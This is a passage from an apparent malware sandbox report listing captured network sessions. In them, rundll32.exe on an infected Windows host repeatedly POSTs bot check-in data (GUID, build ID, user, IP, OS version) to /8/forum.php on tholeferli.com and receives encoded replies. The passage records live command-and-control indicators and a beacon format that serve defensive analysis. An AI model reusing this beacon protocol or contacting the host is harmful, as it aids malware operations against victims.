                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 59 42 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGYBTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                82192.168.2.2249249194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:45.925512075 CEST387OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:46.091377020 CEST387INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:45 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYJQBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                83192.168.2.2249250194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:46.375261068 CEST388OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:46.543394089 CEST388INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 4b 50 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVKPEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                84192.168.2.2249251194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:46.829147100 CEST389OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:46.996254921 CEST389INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:46 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 47 54 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFGTUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                85192.168.2.2249252194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:47.276248932 CEST390OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:47.444124937 CEST391INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 5a 41 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGZATARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                86192.168.2.2249253194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:47.718240023 CEST391OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:47.875224113 CEST392INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:47 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4d 4e 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZMNAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                87192.168.2.2249254194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:48.149163961 CEST393OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:48.315056086 CEST393INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:48 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZJQAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                88192.168.2.2249255194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:48.587294102 CEST394OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:48.743767977 CEST394INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:48 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 47 54 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTGTGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                89192.168.2.2249256194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:49.030864954 CEST395OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:49.186918974 CEST395INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 56 45 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFVEUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.2249176194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:07.405028105 CEST301OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:07.562021971 CEST301INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 47 54 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJGTQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                90192.168.2.2249257194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:49.458745956 CEST396OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:49.625276089 CEST396INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 48 51 4a 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cHQJSARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                91192.168.2.2249258194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:49.899928093 CEST397OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:50.072293997 CEST397INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:49 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 48 53 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYHSBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                92192.168.2.2249259194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:50.362248898 CEST398OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:50.531900883 CEST398INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:50 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 56 48 53 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cVHSEARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                93192.168.2.2249260194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:50.801610947 CEST399OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:50.971095085 CEST400INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:50 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 51 4a 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBQJYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                94192.168.2.2249261194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:51.277574062 CEST400OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:51.433959007 CEST401INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:51 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 4a 51 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYJQBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                95192.168.2.2249262194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:51.715058088 CEST402OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:51.870856047 CEST402INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:51 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 46 55 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJFUQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                96192.168.2.2249263194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:52.144679070 CEST403OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:52.313642025 CEST403INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4a 51 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJJQQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                97192.168.2.2249264194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:52.598970890 CEST404OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:52.765852928 CEST404INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:52 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 56 45 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNVEMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                98192.168.2.2249265194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:53.057029009 CEST405OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
